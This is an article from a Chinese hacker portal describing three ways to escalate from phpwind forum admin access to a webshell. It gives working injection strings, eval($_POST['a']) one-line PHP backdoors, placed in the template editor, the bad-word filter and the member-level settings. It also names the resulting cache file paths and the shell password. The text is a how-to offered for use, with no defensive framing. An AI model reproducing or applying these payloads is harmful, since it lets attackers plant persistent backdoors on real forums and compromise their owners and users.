 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| phpwind 从后台到webshell的三种方式 | |||||
作者:浅蓝的辐… 文章来源:邪恶八进制信息安全团队技术论坛 点击数: 更新时间:2005-8-14  |
|||||
|
方式1 模板法 进入后台, 风格模版设置 ,在随便一行写代码 记住,这代码必须顶着左边行写,代码前面不可以有任何字符。 EOT; eval($a); print <<<EOT 例如,我写完某一行为。 .headurl { color:#ffffff;} EOT; eval($_POST[’a’]); print <<<EOT .index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;} 而后得到一个shell http://localhost/bbs/index.php (由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的) 密码是a lanker的一句话后门。 方始2 脏话过滤法 进入安全管理 ◇ 不良词语过滤 新增 不良词语写 a’]=’aa’;eval($_POST[’a’]);// 替换为那里可以随意写 而后得到一个shell地址为 http://localhost/bbs/data/bbscache/wordsfb.php 密码是a lanker的一句话后门。 方式3 用户等级管理 然后新建立会员组 头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a’;eval($_POST[’a’]);// 升级点数依然可以随意写。 而后得到一个shell地址为 http://localhost/bbs/data/bbscache/level.php 密码是a lanker的一句话后门。 这里提供的方式随便你选一种都可以得到shell。。。 方式三请按说明仔细操作,否则会导致论坛无法正常运行,后果,自负。 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| HP-UX get_system_info的工具 iPhone“越狱” 中国黑客逼得 黑客隐藏PHP文件后门的技巧 Cisco 7940 Phone SIP 消息远 iPhone遭美17岁少年解锁 黑客 美国高中生破解iPhone 移植到 苹果周二发补丁 iPhone也出 安全问题?苹果iPhone放出1. P2P Windows网络安全体验我们 安全公司发现iPhone严重安全 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
